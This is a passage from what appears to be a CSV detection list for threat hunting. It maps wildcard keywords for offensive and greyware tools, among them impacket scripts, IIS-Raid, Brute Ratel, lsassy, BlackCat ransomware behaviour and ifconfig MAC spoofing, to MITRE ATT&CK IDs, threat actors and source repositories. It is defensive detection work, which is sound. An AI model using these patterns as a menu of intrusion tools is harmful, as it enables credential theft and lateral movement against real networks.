which haven't been accessed for a period of time,T1070.004 - T1059 - T1047,TA0007 - TA0002 - TA0040,N/A,N/A,N/A,https://linux.die.net/man/8/tmpwatch,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*ifconfig * hw ether *,greyware_tool_keyword,ifconfig,change mac address with ifconfig,T1027,TA0002,N/A,N/A,Defense Evasion,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*ifconfig * hw ether *:*:*,greyware_tool_keyword,ifconfig,changing mac address with ifconfig,T1497.001 - T1036.004 - T1059.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,5,10,N/A,N/A,N/A,N/A -*ifconfig -a | grep * | xargs nmap -*,greyware_tool_keyword,nmap,Nmap Scan Every Interface that is Assigned an IP address,T1018 - T1046,TA0007,N/A,N/A,Network Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*ifnaibldjfdmaipaddffmgcmekjhiloa*,greyware_tool_keyword,FREE VPN DEWELOPMENT,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*igahhbkcppaollcjeaaoapkijbnphfhb*,greyware_tool_keyword,Social VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*IIS-Backdoor.*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*IIS-Raid-master*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*iisreset.exe /stop*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ikeforce.py*,offensive_tool_keyword,IKEForce,IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.,T1110 - T1201 - T1018,TA0001 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/SpiderLabs/ikeforce,1,1,N/A,N/A,3,226,73,2019-09-18T09:35:41Z,2014-09-12T01:11:00Z -*ikescan2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ILBypass.ps1*,offensive_tool_keyword,octopus,Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*imapattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*imapattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*imaprelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*imaprelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*imp_Badger*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-* *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-*.tar.gz*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*impacket.*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation 
tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*'impacket.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.git*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.ldap*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.ntlm*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.smbconnection*,offensive_tool_keyword,smbcrawler,SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares,T1077 - T1021 - T1110 - T1083,TA0002 - TA0008 - TA0009,N/A,N/A,Lateral Movement - Collection,https://github.com/SySS-Research/smbcrawler,1,1,N/A,N/A,2,129,13,2023-05-14T06:48:40Z,2021-06-09T19:27:08Z -*impacket/*.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket:latest*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket__init__*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket_findDelegation*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*impacket_rpcdump_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*impacket-atexec*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-dcomexec*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketfile.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*impacket-GetADUsers*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-GetNPUsers*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-getST*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-getTGT*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketldap_shell*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketlogger*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-lookupsid*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketmssqlshell*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-netview*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketntlmrelayx*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketos_ident*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-psexec*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-reg*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - 